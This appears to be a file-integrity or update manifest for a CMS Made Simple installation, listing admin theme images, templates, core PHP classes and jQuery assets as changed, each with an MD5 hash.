CHANGED :: 9b5d24072ea3543f6ad0503651746777 :: \admin\themes\OneEleven\images\icons\topfiles\modules.gif
CHANGED :: fbabd8b78f0cf5308a8c9da704d81c0c :: \admin\themes\OneEleven\images\icons\topfiles\modules.png
CHANGED :: c8d070e4b1351f3131cc60819697df32 :: \admin\themes\OneEleven\images\icons\topfiles\myaccount.gif
CHANGED :: 09f4e1ffada37b3f91775309c0cfa0cc :: \admin\themes\OneEleven\images\icons\topfiles\myaccount.png
CHANGED :: c8d070e4b1351f3131cc60819697df32 :: \admin\themes\OneEleven\images\icons\topfiles\myprefs.gif
CHANGED :: 09f4e1ffada37b3f91775309c0cfa0cc :: \admin\themes\OneEleven\images\icons\topfiles\myprefs.png
CHANGED :: 51e003d49a8d0dd77ece45ecda15a0d5 :: \admin\themes\OneEleven\images\icons\topfiles\news.gif
CHANGED :: 30cbbc4eedb7889a5b5b7e42634a7a59 :: \admin\themes\OneEleven\images\icons\topfiles\news.png
CHANGED :: 7b77cac0b75012598087ebdd067e0056 :: \admin\themes\OneEleven\images\icons\topfiles\pagedefaults.gif
CHANGED :: ecbf35bf693233428ae242df0fb17aaa :: \admin\themes\OneEleven\images\icons\topfiles\pagedefaults.png
CHANGED :: 2f9a832570404ae505eb4d1ea808180e :: \admin\themes\OneEleven\images\icons\topfiles\pages.gif
CHANGED :: 63f7810b08aac727642b2d76731d84df :: \admin\themes\OneEleven\images\icons\topfiles\pages.png
CHANGED :: f2e43be62c228810caad4855feb7293e :: \admin\themes\OneEleven\images\icons\topfiles\preferences.gif
CHANGED :: f0c876fff4777253732574a03cdef079 :: \admin\themes\OneEleven\images\icons\topfiles\preferences.png
CHANGED :: 09724f7c4f1398dbd513c2c0ad66b3e5 :: \admin\themes\OneEleven\images\icons\topfiles\search.gif
CHANGED :: 83ff25c7202f78fc11b84586e06bc2b7 :: \admin\themes\OneEleven\images\icons\topfiles\search.png
CHANGED :: 6d797905bc2ad3daedfcbc3ab0c7f074 :: \admin\themes\OneEleven\images\icons\topfiles\siteadmin.gif
CHANGED :: ff71ae6200fa083a3b5d9bffffef5f15 :: \admin\themes\OneEleven\images\icons\topfiles\siteadmin.png
CHANGED :: 581ce3a78d3319bfee8eee6485c332d1 :: \admin\themes\OneEleven\images\icons\topfiles\siteprefs.gif
CHANGED :: 55c9bc5d8d3714cf5ad66960ac8d44c3 :: \admin\themes\OneEleven\images\icons\topfiles\siteprefs.png
CHANGED :: 02aa53685669e4894f150cf8b5bac443 :: \admin\themes\OneEleven\images\icons\topfiles\stylesheets.gif
CHANGED :: e94a1338eabb630a179aa82153f777f8 :: \admin\themes\OneEleven\images\icons\topfiles\stylesheets.png
CHANGED :: 79cadbf5881ce1090db8c38da17b3502 :: \admin\themes\OneEleven\images\icons\topfiles\systeminfo.gif
CHANGED :: 7d6e2d4b6ac10e022d88e96898539811 :: \admin\themes\OneEleven\images\icons\topfiles\systeminfo.png
CHANGED :: 40035ac547a11d35deede736229ba398 :: \admin\themes\OneEleven\images\icons\topfiles\systemmaintenance.gif
CHANGED :: 8d13e61e3e0ebb5045f49f26b4ff1981 :: \admin\themes\OneEleven\images\icons\topfiles\systemmaintenance.png
CHANGED :: a48b02973886e0c03aceabe2e109d224 :: \admin\themes\OneEleven\images\icons\topfiles\tags.gif
CHANGED :: be17c94a9b0378c214ee745640cc285b :: \admin\themes\OneEleven\images\icons\topfiles\tags.png
CHANGED :: c3dcd832f160448329732f95e008a024 :: \admin\themes\OneEleven\images\icons\topfiles\template.gif
CHANGED :: 99db64fda6a823bd3eebf7ae23584176 :: \admin\themes\OneEleven\images\icons\topfiles\template.png
CHANGED :: 40fa017f58131be3cef1a0f0d78ea78f :: \admin\themes\OneEleven\images\icons\topfiles\usergroups.gif
CHANGED :: c8d070e4b1351f3131cc60819697df32 :: \admin\themes\OneEleven\images\icons\topfiles\users.gif
CHANGED :: 09f4e1ffada37b3f91775309c0cfa0cc :: \admin\themes\OneEleven\images\icons\topfiles\users.png
CHANGED :: e5ec2092cdda122796e9d581c63c326d :: \admin\themes\OneEleven\images\icons\topfiles\usersgroups.png
CHANGED :: 55ac2a6ef06ad2a59702d653677f563f :: \admin\themes\OneEleven\images\icons\topfiles\usertags.gif
CHANGED :: 9b2a6212e6dfcc6a791b2c79198dff54 :: \admin\themes\OneEleven\images\icons\topfiles\usertags.png
CHANGED :: 09724f7c4f1398dbd513c2c0ad66b3e5 :: \admin\themes\OneEleven\images\icons\topfiles\viewsite.gif
CHANGED :: 83ff25c7202f78fc11b84586e06bc2b7 :: \admin\themes\OneEleven\images\icons\topfiles\viewsite.png
CHANGED :: 454b67301a4ca02cabf6ba865cd0fb09 :: \admin\themes\OneEleven\images\icons\topfiles\wysiwyg.gif
CHANGED :: 9b6f3d793b977ab14c002063ac2c3063 :: \admin\themes\OneEleven\images\icons\topfiles\wysiwyg.png
CHANGED :: 1857c737c450bd30362083ab446aa282 :: \admin\themes\OneEleven\images\layout\accept.png
CHANGED :: ffed121f7df07cae281f3533e1a22f49 :: \admin\themes\OneEleven\images\layout\admin-off.png
CHANGED :: 3d248eac5495d61cc73fa5e7b3d2b0c8 :: \admin\themes\OneEleven\images\layout\admin-on.png
CHANGED :: 363b60b4a1f3ae8fa176184b2e614b7a :: \admin\themes\OneEleven\images\layout\block.png
CHANGED :: 8a422d50a8f93e6e2097dd4635533109 :: \admin\themes\OneEleven\images\layout\bottom-shadow.png
CHANGED :: cf1513b3a67ddeb3c5b66790a7603467 :: \admin\themes\OneEleven\images\layout\breadcrubms-divider-rtl.png
CHANGED :: e464dbb0f8b27341c042d9548689b961 :: \admin\themes\OneEleven\images\layout\breadcrubms-divider.png
CHANGED :: 5991c09118569455c8efe092317b734b :: \admin\themes\OneEleven\images\layout\close-sidebar-rtl.png
CHANGED :: 869edbdbc5c45d6829fbcc8e79a02514 :: \admin\themes\OneEleven\images\layout\cms-logo-bg.gif
CHANGED :: c3c42d8b21bc8a12b12b811456626db7 :: \admin\themes\OneEleven\images\layout\cmsms-logo.jpg
CHANGED :: db030c52a1eee45aceedc53cd65d4a08 :: \admin\themes\OneEleven\images\layout\cmsms_login_logo.png
CHANGED :: 945972463e1c154f072bb9559efe64cc :: \admin\themes\OneEleven\images\layout\content-off.png
CHANGED :: f6a06b963a251bd02fcb73cf7e5d7d78 :: \admin\themes\OneEleven\images\layout\content-on.png
CHANGED :: 2d0d2baf1ae08563a92fcc427f592a8e :: \admin\themes\OneEleven\images\layout\email-icon.png
CHANGED :: 721e02fc3127a2313cd5742fea0a638a :: \admin\themes\OneEleven\images\layout\exclamation.png
CHANGED :: ee4ef8a8e7297492ff69aebf78dc2646 :: \admin\themes\OneEleven\images\layout\extensions-off.png
CHANGED :: 575bf5368b89eaed898e99b9732109f4 :: \admin\themes\OneEleven\images\layout\extensions-on.png
CHANGED :: e28a38a8e031cfdfc60968e85da2ab07 :: \admin\themes\OneEleven\images\layout\folder-horizontal-open.png
CHANGED :: 2d6acf8c60ad51b2f4cee2ce5e03f096 :: \admin\themes\OneEleven\images\layout\goback.png
CHANGED :: 9a33022b2c68e7ee23a95570c10d439d :: \admin\themes\OneEleven\images\layout\help.png
CHANGED :: 1e232ece7dfa15ff5f50f0beac63bd07 :: \admin\themes\OneEleven\images\layout\home-button.png
CHANGED :: 9cd0ad16733c62784de4bd95e9eb94c1 :: \admin\themes\OneEleven\images\layout\home-icon.png
CHANGED :: 3ef7811d8157bd6db95a24a5c19bc695 :: \admin\themes\OneEleven\images\layout\home-off.png
CHANGED :: b2ec722c113d9b95f5f2876d2bb4ae3a :: \admin\themes\OneEleven\images\layout\home-on.png
CHANGED :: 9f8764c494ea8c725265f516ecdde65e :: \admin\themes\OneEleven\images\layout\info-icon.png
CHANGED :: f56bf2e620dc6ec900fb246dbeb6337e :: \admin\themes\OneEleven\images\layout\info.png
CHANGED :: 104082b281be7d0aabd66e2f18fa520c :: \admin\themes\OneEleven\images\layout\information.png
CHANGED :: 2f0fca52181b8bf158d4abae74274c83 :: \admin\themes\OneEleven\images\layout\input-bg.gif
CHANGED :: 6ebb92b1046bb9b9775e3eceb16753bb :: \admin\themes\OneEleven\images\layout\input-hover-bg.gif
CHANGED :: 828dde4c7181207c235f1d11e19a7b2c :: \admin\themes\OneEleven\images\layout\layout-off.png
CHANGED :: 69991181929904a7617a8b8e4f01df44 :: \admin\themes\OneEleven\images\layout\layout-on.png
CHANGED :: 0908ae80010da7d1adad1dbc9a60049c :: \admin\themes\OneEleven\images\layout\login-bg.gif
CHANGED :: 4a80e17677405b0dacd24debbb10ea4a :: \admin\themes\OneEleven\images\layout\login-top-bg.gif
CHANGED :: a861f256b777197a2523156e47e3f990 :: \admin\themes\OneEleven\images\layout\navigation-bg.gif
CHANGED :: a17424e6f30970d50656a959e3f65263 :: \admin\themes\OneEleven\images\layout\open-sidebar-rtl.png
CHANGED :: 49888a5ab993edefb2aefa5b0d8db323 :: \admin\themes\OneEleven\images\layout\preferences-off.png
CHANGED :: 3a2dce3a691fb6d11348aee333e17d0d :: \admin\themes\OneEleven\images\layout\preferences-on.png
CHANGED :: b44a6da6be0d7853a7c6a3e4ecae3708 :: \admin\themes\OneEleven\images\layout\sidebar-shadow-rtl.png
CHANGED :: f09a06bcfb5e987d1f56d5cf4ada6dc0 :: \admin\themes\OneEleven\images\layout\sidebar-shadow.png
CHANGED :: 20e49469e650d86c251f5b6732b16010 :: \admin\themes\OneEleven\images\layout\sprite_norepeat.png
CHANGED :: 8d89548c3e772c90d8c138d9b92f4654 :: \admin\themes\OneEleven\images\layout\sprite_repeatx.png
CHANGED :: e7b30f18e6634b30944c983b7bac9acb :: \admin\themes\OneEleven\images\layout\submit-bg.gif
CHANGED :: 0d385f6c849f84f0399afa6cb1844b64 :: \admin\themes\OneEleven\images\layout\submit-hover.gif
CHANGED :: 31edee7a71c754be5a4a57b94fe58462 :: \admin\themes\OneEleven\images\layout\tab-active.png
CHANGED :: e2ab0ade9f4426b90de02d6bb469d921 :: \admin\themes\OneEleven\images\layout\toggle-dropzone.png
CHANGED :: e8ad0e4f1996a2c2a96d70cb8773cfd1 :: \admin\themes\OneEleven\images\layout\user-icon.png
CHANGED :: cb91412d2d29e1c4700111cfb100e251 :: \admin\themes\OneEleven\images\layout\users-off.png
CHANGED :: 323bb78e987459b1bc2956bab5dfffb3 :: \admin\themes\OneEleven\images\layout\users-on.png
CHANGED :: c3ae21675ea02b2fc8eb6c0ec2f9683b :: \admin\themes\OneEleven\images\layout\warning.png
CHANGED :: c0ec876d79addd2631e25f8938e19686 :: \admin\themes\OneEleven\images\layout\welcome-bg.gif
CHANGED :: 545a909b4695aba65049fd77cfdc09e2 :: \admin\themes\OneEleven\images\logo.gif
CHANGED :: 7adc814aa2be347c3b0f946867f2b8e8 :: \admin\themes\OneEleven\images\logoCMS.png
CHANGED :: 343ff7096e03c591e92c64289223cdf0 :: \admin\themes\OneEleven\includes\jquery.cookie.js
CHANGED :: b0d1a7843786d66eb23b8a4cbaca0cf0 :: \admin\themes\OneEleven\includes\jquery.cookie.min.js
CHANGED :: 5bbc9f422f26d607284d1e566bd5e9d0 :: \admin\themes\OneEleven\includes\login.js
CHANGED :: 243ed7feb5366d5c623b70ccb12a2c51 :: \admin\themes\OneEleven\includes\standard.js
CHANGED :: d084d89314b8b64b7982db1037246ebd :: \admin\themes\OneEleven\includes\standard.min.js
CHANGED :: ccf6442b61bd1a6ad183dd7d2a17155b :: \admin\themes\OneEleven\login.php
CHANGED :: 5cafb04a10e4c4d355d9f06d086c5b03 :: \admin\themes\OneEleven\OneElevenTheme.php
CHANGED :: ee522ab2926e69ae9b10d8b777dde787 :: \admin\themes\OneEleven\templates\breadcrumbs.tpl
CHANGED :: d62f0773ca2b50de9726ac8192159b80 :: \admin\themes\OneEleven\templates\footer.tpl
CHANGED :: 6a04cddf2a7ebff4d9cef83aeba9b186 :: \admin\themes\OneEleven\templates\login.tpl
CHANGED :: d910628260b0aaead10706167e3ec1f5 :: \admin\themes\OneEleven\templates\messages.tpl
CHANGED :: b1b84cf82450f86e604a73536b2b8e2b :: \admin\themes\OneEleven\templates\navigation.tpl
CHANGED :: 801001dbf685eaeec0c358950ca57316 :: \admin\themes\OneEleven\templates\notifications.tpl
CHANGED :: 69e97881660818fb077994039a2c0db8 :: \admin\themes\OneEleven\templates\pagetemplate.tpl
CHANGED :: c4c0b77f912db5e6af966a35adeb99f2 :: \admin\themes\OneEleven\templates\shortcuts.tpl
CHANGED :: 4afe0dca04e353fe05d4cde61db81bdb :: \admin\themes\OneEleven\templates\topcontent.tpl
CHANGED :: 679b1d3cd96b7b925ac6ecbf4dc201f1 :: \doc\.htaccess
CHANGED :: 075d5e17985521944557f7137a0fd012 :: \doc\AUTHORS.txt
CHANGED :: 6ac307cace801362e051cf78f83cb360 :: \doc\CHANGELOG.txt
CHANGED :: 46aaf69a91703493b666f212a04f2d8d :: \doc\COPYING.txt
CHANGED :: 15e6faa52837578e81456e68e44cf717 :: \doc\htaccess.txt
CHANGED :: 0398734e78739a25cee1ba96c64be327 :: \doc\README.txt
CHANGED :: ee9ecc396f998b3b5ee8c1b288521d01 :: \doc\robots.txt
CHANGED :: ebf500d206705bda0cb79021c15da98a :: \favicon_cms.ico
CHANGED :: c7fad4c21f8c4e1fd62d4a5a918bdee4 :: \index.php
CHANGED :: 6a64f692037afa65625bf546338f3be1 :: \lib\assets\images\cmsms-logo.png
CHANGED :: 0878fc345994439040cdbcf6f3ae4ce0 :: \lib\assets\templates\cmsms-error-console.tpl
CHANGED :: 60fc646afe255343a38d453d4f574455 :: \lib\autoloader.php
CHANGED :: 9ae8e81d49419b225ca511c874dd33d4 :: \lib\classes\AdminAlerts\class.Alert.php
CHANGED :: 044dac9c41326846d67102cb27debc2a :: \lib\classes\AdminAlerts\class.SimpleAlert.php
CHANGED :: ec037c6b01408d16256a2e7d314e3023 :: \lib\classes\AdminAlerts\class.TranslatableAlert.php
CHANGED :: 1b233e755aaaa4427401885aad5af2c3 :: \lib\classes\Async\class.CronJob.php
CHANGED :: 1460a4b13a1d33e7547efd02e151a303 :: \lib\classes\Async\class.CronJobInterface.php
CHANGED :: 795b2db10107f9c890793b10d8425109 :: \lib\classes\Async\class.CronJobTrait.php
CHANGED :: a08342362d290088f9ec77c085627071 :: \lib\classes\Async\class.ExternalHandlerJob.php
CHANGED :: 5b449b2ced31027d5b5238261886a387 :: \lib\classes\Async\class.Job.php
CHANGED :: 26d16a2005396888b4de1ed68551a189 :: \lib\classes\Async\class.JobManager.php
CHANGED :: b7f6bba72b36690ce5f3da050e10382d :: \lib\classes\Async\class.RegularTask.php
CHANGED :: 42eca2f66a2cc2a826bd2db2c392ca6b :: \lib\classes\class.bookmark.inc.php
CHANGED :: 0c781c0104c6232d51a3b4e4572e39b3 :: \lib\classes\class.bookmarkoperations.inc.php
CHANGED :: d55bb0782087bada7bf5ba08795b764b :: \lib\classes\class.CmsAdminMenuItem.php
CHANGED :: bd7b147fa9d3bbd89874b4a531c95688 :: \lib\classes\class.CmsAdminThemeBase.php
CHANGED :: f8c4a0c37135fd00dcdd46f0230f5eb8 :: \lib\classes\class.CmsAdminUtils.php
CHANGED :: 48899a92e8b4be257ab64d94c788d6f6 :: \lib\classes\class.CmsApp.php
CHANGED :: 8c6d3399727d9d32fc17f48373f9eb10 :: \lib\classes\class.CmsCoreCapabilities.php
CHANGED :: 5f0de1125e8a7cddf10de4bde6c3b2e2 :: \lib\classes\class.CmsDbQueryBase.php
CHANGED :: 3b8949787b77523e1861be3a06db2fca :: \lib\classes\class.CmsException.php
CHANGED :: 00555b7fd5e3dd7d11022dcaff81b07e :: \lib\classes\class.CmsFormUtils.php
CHANGED :: b09806cc91f0db0486cacdb121956a52 :: \lib\classes\class.CmsLangOperations.php
CHANGED :: ea850fc05d0bf3fab9fe332fcc0d5127 :: \lib\classes\class.CmsLanguageDetector.php
CHANGED :: 34d52b0de6c73d8ec020d147d5ac9c31 :: \lib\classes\class.CmsLayoutCollection.php
CHANGED :: 9631ec46f8c83a2bd0ad8af187d9d0e1 :: \lib\classes\class.CmsLayoutStylesheet.php
CHANGED :: 2786dfc55d05116cfc1e306fa6cead1f :: \lib\classes\class.CmsLayoutStylesheetQuery.php
CHANGED :: 0fbae4341dfd0f26248d6101d53be7d2 :: \lib\classes\class.CmsLayoutTemplate.php
CHANGED :: 435eb82a99168fb77f9ff5fdbeaf7eb2 :: \lib\classes\class.CmsLayoutTemplateCategory.php
CHANGED :: 5681a1d0d08e48cc693a5a2ee9832c5b :: \lib\classes\class.CmsLayoutTemplateQuery.php
CHANGED :: 8793c6514a6cb24523221f2074d1787c :: \lib\classes\class.CmsLayoutTemplateType.php
CHANGED :: 501a140adabd26bee033e6cb59ce5e67 :: \lib\classes\class.CmsLock.php
CHANGED :: a15e2510f866048a5654cd4fe6e87707 :: \lib\classes\class.CmsLockOperations.php
CHANGED :: 656a8c54a15ad8e63fee0c17bc4e6776 :: \lib\classes\class.CMSModule.php
CHANGED :: 6a76cc7370aab52974ec9fc76e707282 :: \lib\classes\class.CMSModuleContentType.php
CHANGED :: 04188ba2bdcad2ce226171fea22e9b6e :: \lib\classes\class.CmsNls.php
CHANGED :: ec708daa018e5c792be683991543ae46 :: \lib\classes\class.CmsNlsOperations.php
CHANGED :: 60d2666be75d76252bcfbce2c420aa91 :: \lib\classes\class.CmsPermission.php
CHANGED :: 2d3cfa79f99426e732e452a70aa390c5 :: \lib\classes\class.CmsRoute.php
CHANGED :: 81fa74eaa1795529e37db5daec464a95 :: \lib\classes\class.cms_admin_tabs.php
CHANGED :: c842bc8514a02fa1d3b0a1a6c364c028 :: \lib\classes\class.cms_admin_utils.php
CHANGED :: c6f77ebfcbfd19b1575ec5225c9da767 :: \lib\classes\class.cms_cache_driver.php
CHANGED :: 3fe09cfdd28c26cabc7e9db26813fb9b :: \lib\classes\class.cms_cache_handler.php
CHANGED :: e7df5c88cf24cf31870482194f92ccd6 :: \lib\classes\class.cms_config.php
CHANGED :: 55e31886248654e549e5b2a6b305eb69 :: \lib\classes\class.cms_content_tree.php
CHANGED :: 5248ae8a3c6f0af7cf0813aa40940d36 :: \lib\classes\class.cms_cookies.php
CHANGED :: e6fce476c218c1303fbd82c2c92a72c4 :: \lib\classes\class.cms_filecache_driver.php
CHANGED :: c307092351fd6afe3a5f51bca57f9264 :: \lib\classes\class.cms_http_request.php
CHANGED :: 3f224c63fd38a7bcbd5c5876cd974e6b :: \lib\classes\class.cms_mailer.php
CHANGED :: 300769f155d462c385e9d3e2771d0807 :: \lib\classes\class.cms_module_smarty_plugin_manager.php
CHANGED :: ef82df677626e650859afe738cbc33ff :: \lib\classes\class.cms_route_manager.php
CHANGED :: d9f41a5b7cc04b0decfa60b758c4e31f :: \lib\classes\class.cms_siteprefs.php
CHANGED :: d747382b8ffd2c11bcb131a5b36760de :: \lib\classes\class.cms_tree.php
CHANGED :: 75e585bb00bbef9e69cc90bebf2a1702 :: \lib\classes\class.cms_tree_operations.php
CHANGED :: 14d59722dc69f41d221bfe2e3c78ad4d :: \lib\classes\class.cms_url.php
CHANGED :: 9cfea6d552654a401b2becf962b008ce :: \lib\classes\class.cms_userprefs.php
CHANGED :: a5da156dd96f185d084e09479f563425 :: \lib\classes\class.cms_utils.php
CHANGED :: 77883bcf8a43c775df039aedbc95f2bf :: \lib\classes\class.ContentBase.php
CHANGED :: f3bc4ed00439d10923d75ca11cd730b7 :: \lib\classes\class.contentoperations.inc.php
CHANGED :: edad24eb1d585c293693a694b62affec :: \lib\classes\class.Events.php
CHANGED :: 1a0df1d52a5df63e8595b8394505d9b2 :: \lib\classes\class.FilePickerProfile.php
CHANGED :: 1aae2a5232e66edaef15f07bab233a76 :: \lib\classes\class.FileType.php
CHANGED :: 8d8fb89444c9e2d032381bfc041cb172 :: \lib\classes\class.FileTypeHelper.php
CHANGED :: 6a9060e34972fd3ae7ee9bfd6bbd5f3e :: \lib\classes\class.group.inc.php
CHANGED :: eac954d2dea20236363d33e13efcb022 :: \lib\classes\class.groupoperations.inc.php
CHANGED :: e628a7bad115311351b666f855cb7999 :: \lib\classes\class.HookManager.php
CHANGED :: af0efa7ca76878451ee7c16b6e928921 :: \lib\classes\class.moduleoperations.inc.php
CHANGED :: 7405d10d324376ca8f81081b1e4fbee7 :: \lib\classes\class.user.inc.php
CHANGED :: 18127a98af7ac46ef118ec0275b4f3c3 :: \lib\classes\class.useroperations.inc.php
CHANGED :: 0497cd56019b73b6ddf3ea2ce3819dc3 :: \lib\classes\class.usertagoperations.inc.php
CHANGED :: e461b7c5152624b999f179d9bc174dab :: \lib\classes\contenttypes\Content.inc.php
CHANGED :: 28dc048996a3058bacbdfd69730e537d :: \lib\classes\contenttypes\ErrorPage.inc.php
CHANGED :: c09d00465ce02540aa17f42a0e4d7b0c :: \lib\classes\contenttypes\Link.inc.php
CHANGED :: 17fc3fd3df4f3ee3d1c3e885975375b1 :: \lib\classes\contenttypes\PageLink.inc.php
CHANGED :: 576210b9e6647ff01113a689431ba6a5 :: \lib\classes\contenttypes\SectionHeader.inc.php
CHANGED :: ed296500e3da38e10f9962af54d14a2c :: \lib\classes\contenttypes\Separator.inc.php
CHANGED :: b26dbb18f0a09b4d35b79eeb90904153 :: \lib\classes\Database\class.compatibility.php
CHANGED :: ee4c288dee4e6df58809fea1153fd77f :: \lib\classes\Database\class.Connection.php
CHANGED :: ca5ba840b105c3aa0c8f54fa96d8b978 :: \lib\classes\Database\class.ConnectionSpec.php
CHANGED :: a375b6fa1ad0597b14908bb293b893f6 :: \lib\classes\Database\class.DataDictionary.php
CHANGED :: 7daed78ef895e82e17c6b00c2e1293ed :: \lib\classes\Database\class.EmptyRecordSet.php
CHANGED :: ef15c4b6ae608b68466418dc44ea9a51 :: \lib\classes\Database\class.ResultSet.php
CHANGED :: ea2931248ab156d1201804986ad9ad1d :: \lib\classes\Database\class.Statement.php
CHANGED :: 46b24265681dfad195b891a70e738750 :: \lib\classes\Database\mysqli\class.Connection.php
CHANGED :: 8dcf26631a875c21affcb631831b93ee :: \lib\classes\Database\mysqli\class.DataDictionary.php
CHANGED :: 40e2bc9af26e053e6448bf4756f87e8d :: \lib\classes\Database\mysqli\class.ResultSet.php
CHANGED :: b3f9234a21dd5284d54db37fdb25b296 :: \lib\classes\Database\mysqli\class.Statement.php
CHANGED :: 03d1ec7c0c61cb7153abe261c4c816a0 :: \lib\classes\interface.CmsRegularTask.php
CHANGED :: 3f48ada1d569281378784b772cbcb8df :: \lib\classes\interface.FilePickerInterface.php
CHANGED :: 284a20ae8aec995449fade286ef6cfea :: \lib\classes\internal\class.bulkcontentoperations.php
CHANGED :: e8ffb28a9d945221c318b2f64b331b47 :: \lib\classes\internal\class.CMSContentTemplateResource.php
CHANGED :: 47abc255aeaa6d8cffa616b3492f35b7 :: \lib\classes\internal\class.CmsExtendedModuleInfo.php
CHANGED :: 145e90b7534d167a84afe3f9711d2d6f :: \lib\classes\internal\class.CMSModuleDbTemplateResource.php
CHANGED :: da09f7f2e6db9a67c492c3dcedb7c79d :: \lib\classes\internal\class.CmsModuleInfo.php
CHANGED :: 086b20b22c9385c0801caec938ee8d7f :: \lib\classes\internal\class.CMSSmartyBase.php
CHANGED :: f644d1ffce7877d9b290d734dfb35cd2 :: \lib\classes\internal\class.CMSSmartySecurityPolicy.php
CHANGED :: 4f940992eadcd120aa39b1ff639d646b :: \lib\classes\internal\class.CmsStylesheetResource.php
CHANGED :: c2885a1a8f66307d2e907ba159867759 :: \lib\classes\internal\class.CmsTemplateCache.php
CHANGED :: eb3714aab075232034f1d247fffbe395 :: \lib\classes\internal\class.CmsTemplateResource.php
CHANGED :: 0194a46a201bc288ff02421461af9ec7 :: \lib\classes\internal\class.CMS_Content_Block.php
CHANGED :: 93526198e89150b6f8db2bbd9961ccdc :: \lib\classes\internal\class.cms_content_cache.php
CHANGED :: 57f1647b494c9024f0bf16458265b741 :: \lib\classes\internal\class.CMS_Fixed_Resource_Custom.php
CHANGED :: e315bbf1347406586c9b70bf6a7c5426 :: \lib\classes\internal\class.CMS_Smarty_Template.php
CHANGED :: a32cec35850cfde42f89fb69d9ff60a7 :: \lib\classes\internal\class.content_assistant.php
CHANGED :: 78a900ab9fc1bce6221a0e4fd1565447 :: \lib\classes\internal\class.global_cachable.php
CHANGED :: 0b9c56113ac4e2359e33ceac5b6f2296 :: \lib\classes\internal\class.global_cache.php
CHANGED :: 87a8d9531f95f60a02b01f01910b6fc8 :: \lib\classes\internal\class.LoginOperations.php
CHANGED :: 1af5ea6690cba4bc109a016a2c9f6508 :: \lib\classes\internal\class.module_meta.php
CHANGED :: b0c25e485971a920b160a31f5e0f4c88 :: \lib\classes\internal\class.page_template_parser.php
CHANGED :: 026df997d91dd09f4ff77be6b8e73982 :: \lib\classes\internal\class.Smarty_CMS.php
CHANGED :: 4368f3a372cff6229b831eea5aa1a36b :: \lib\classes\internal\class.Smarty_Parser.php
CHANGED :: a8db6debb38ba64869fbc9d5a3ddc693 :: \lib\classes\internal\class.__CORE__generic_Type_Assistant.php
CHANGED :: 95e88d1557c7782bf1883fcd0b29011d :: \lib\classes\internal\interface.ContentAssistant.php
CHANGED :: 29ae48f109fe3cba718dad95bfae165a :: \lib\classes\internal\module_support\modform.inc.php
CHANGED :: e44ac09f9e57e4c9a98da2352baa5bda :: \lib\classes\internal\module_support\modmisc.inc.php
CHANGED :: fde566019e5a1355b691f457d24c800a :: \lib\classes\internal\module_support\modredirect.inc.php
CHANGED :: a9f1c9f868947a5deb7b684b008f0e0d :: \lib\classes\internal\module_support\modtemplates.inc.php
CHANGED :: 2eccd45c7df462342b0a2132269e4b94 :: \lib\classes\Layout\class.TemplateTypeAssistant.php
CHANGED :: edba37fe1be5da3c1ef4f121182e0b5e :: \lib\compat.functions.php
CHANGED :: 437cf393e6af1e1af974c2db39aef769 :: \lib\content.functions.php
CHANGED :: e77489697bf1134ea28434d01650d9f2 :: \lib\html_entity_decode_php4.php
CHANGED :: f272bcb0e4acac8c4738433d89211852 :: \lib\include.php
CHANGED :: 087f421d344855021408ef5af34bdf2a :: \lib\jquery\css\smoothness\images\ui-bg_flat_0_aaaaaa_40x100.png
CHANGED :: 07f3ba43e70abc5a9c2b93b92093b352 :: \lib\jquery\css\smoothness\images\ui-bg_flat_75_ffffff_40x100.png
CHANGED :: 6b19225d4fa4da623ddf89574bfc6070 :: \lib\jquery\css\smoothness\images\ui-bg_glass_55_fbf9ee_1x400.png
CHANGED :: 1eaff0d96a0bc38405d188e3e530e7b0 :: \lib\jquery\css\smoothness\images\ui-bg_glass_65_ffffff_1x400.png
CHANGED :: d797bfeef2cb6ae189b2e135b3827eeb :: \lib\jquery\css\smoothness\images\ui-bg_glass_75_dadada_1x400.png
CHANGED :: 668dde8372f119cd17ac541f19ce67fd :: \lib\jquery\css\smoothness\images\ui-bg_glass_75_e6e6e6_1x400.png
CHANGED :: ca2e0a6783492fb8035cf7be7e06dfcf :: \lib\jquery\css\smoothness\images\ui-bg_glass_95_fef1ec_1x400.png
CHANGED :: 1e3b05373dacccca8b8c40e874d359ac :: \lib\jquery\css\smoothness\images\ui-bg_highlight-soft_75_cccccc_1x100.png
CHANGED :: a1b3887a86cf1791f23c0b53b4d3585f :: \lib\jquery\css\smoothness\images\ui-icons_222222_256x240.png
CHANGED :: 764c37efbf6d7ffc176b466fadc6f2ca :: \lib\jquery\css\smoothness\images\ui-icons_2e83ff_256x240.png
CHANGED :: 6b29e362591a05e270b33c4fc3f67cb2 :: \lib\jquery\css\smoothness\images\ui-icons_454545_256x240.png
CHANGED :: 302ae7a7aed5730c16146b677b123638 :: \lib\jquery\css\smoothness\images\ui-icons_888888_256x240.png
CHANGED :: 5c78585b80fbf4342d21674a04e89c8b :: \lib\jquery\css\smoothness\images\ui-icons_cd0a0a_256x240.png
CHANGED :: 31d680ef35f7d4564782af8cd3e7f601 :: \lib\jquery\css\smoothness\jquery-ui-1.10.4.custom.min.css
CHANGED :: 8101d596b2b8fa35fe3a634ea342d7c3 :: \lib\jquery\js\jquery-1.11.1.min.js
CHANGED :: ffbeb16578d8cdf58104889baacbbef2 :: \lib\jquery\js\jquery-1.11.1.min.map
CHANGED :: eb05d8d73b5b13d8d84308a4751ece96 :: \lib\jquery\js\jquery-migrate-1.2.1.min.js
CHANGED :: df3a368c8d9422ca16a2975341df045f :: \lib\jquery\js\jquery-ui-1.10.4.custom.min.js
CHANGED :: ab0712271db1fbeb4e734ea14cc33ec2 :: \lib\jquery\js\jquery.cmsms_autorefresh.js
CHANGED :: 13eb946ea4468ec8b07bc19581a7d30f :: \lib\jquery\js\jquery.cmsms_dirtyform.js
CHANGED :: 12447912dc757280e551bd953e652d52 :: \lib\jquery\js\jquery.cmsms_filepicker.js
CHANGED :: 1e74567dbdecb47d0c763ce35926b0b3 :: \lib\jquery\js\jquery.cmsms_hierselector.js
CHANGED :: a5c1023fd52f9086fa3a0cae07b94d27 :: \lib\jquery\js\jquery.cmsms_lock.js
CHANGED :: 0ea685654705de860c99d3dd54b20c1c :: \lib\jquery\js\jquery.cms_admin.js
CHANGED :: f7b87723e700272150f9785de8f03f1c :: \lib\jquery\js\jquery.json-2.4.min.js
CHANGED :: 946d83fa633503271865d8308d82eaf5 :: \lib\jquery\js\jquery.mjs.nestedSortable.js
CHANGED :: 594c7fa31e788c18fd6bac62d2824bac :: \lib\jquery\js\jquery.ui.touch-punch.js
CHANGED :: 700b877cd3ade98ce6cd4be349d81a5c :: \lib\jquery\js\jquery.ui.touch-punch.min.js
CHANGED :: 1fb8805dfb2ed66e2464848975269dc0 :: \lib\lang\cms_selflink\en_US.php
